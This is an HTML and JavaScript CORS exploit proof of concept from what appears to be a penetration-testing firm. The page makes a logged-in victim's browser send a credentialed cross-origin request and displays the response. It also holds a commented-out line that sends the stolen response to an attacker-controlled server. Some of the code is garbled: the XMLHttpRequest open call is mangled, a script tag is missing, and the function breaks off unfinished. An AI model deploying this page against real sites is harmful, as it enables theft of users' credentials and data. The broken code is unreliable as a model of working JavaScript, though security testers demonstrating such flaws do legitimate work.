<title>CORS PoC</title>
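<script>
  // Stamp the page with the time the PoC ran, so a screenshot of the popup
  // shows when the credentialed cross-origin request was issued.
  // Invoked from <body onload>.
  function date() {
    // Local name no longer shadows the function itself.
    var now = new Date();
    // textContent, not innerHTML: the value is plain text, and the page is
    // about to display attacker-observed response bodies, so keep the
    // "never assign strings into innerHTML" habit here as well.
    document.getElementById("date").textContent = now;
  }
</script>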
<!-- GUI -->
<body onload="cors(); date();">
<h1>Pentest Factory GmbH CORS PoC</h1>
<table align="left" style="position: absolute; border-spacing: 15px">
<td width="100px"><img src="" width="100px" height="100px"/></td>
<td width="700px" style="font-size: 10pt"><b>Any logged-in user visiting this website will <u>automatically</u> issue a CORS request <u>with supplied credentials</u>, whose response can be captured by an attacker. The response may contain <u>sensitive data</u> such as <u>credentials</u> or <u>customer data</u>!</b><br><br><label id="date" style="font-size: 0.85em;"></label></td>
<label style="position:absolute; margin-top: 170px" id="data"></label>
<!-- CORS -->
// ---- PoC parameters: fill these in before hosting the page ----

// Attacker-controlled collection endpoint. Only consumed by the commented-out
// exfiltration line in cors(), which appends the raw response text to it as an
// <img> URL; wrap the body in encodeURIComponent there, or spaces, '#' and '&'
// in the response will truncate what reaches the server.
var ATKSRV = "";

// Target endpoint the victim's browser calls with credentials attached.
// The browser only exposes the response to this page if the target echoes
// this page's origin in Access-Control-Allow-Origin AND sends
// Access-Control-Allow-Credentials: true ("*" is rejected for credentialed
// requests). Cookies ride along only if the browser is willing to send them
// cross-site (SameSite=None; Secure on current Chromium-based browsers).
// NOTE(review): this top-level var shadows the page's built-in URL
// constructor; renaming it would also require updating cors().
var URL = "";

// HTTP method for the cross-origin request. As far as is visible here no
// custom headers are set, so a body-less POST remains a "simple" request and
// triggers no preflight.
var METHOD = "POST";
function cors(){
var xhr = new XMLHttpRequest();, URL, true);
xhr.withCredentials = true;
xhr.onreadystatechange = function () {
if (xhr.readyState == 4){
// steal sensitive data from CORS response and send it to an attacker's server
//new Image().src = ATKSRV + xhr.responseText
// just alert the CORS response in an JavaScript popup as proof of concept
alert('Sensitive data has been stolen:\n\n' + xhr.responseText);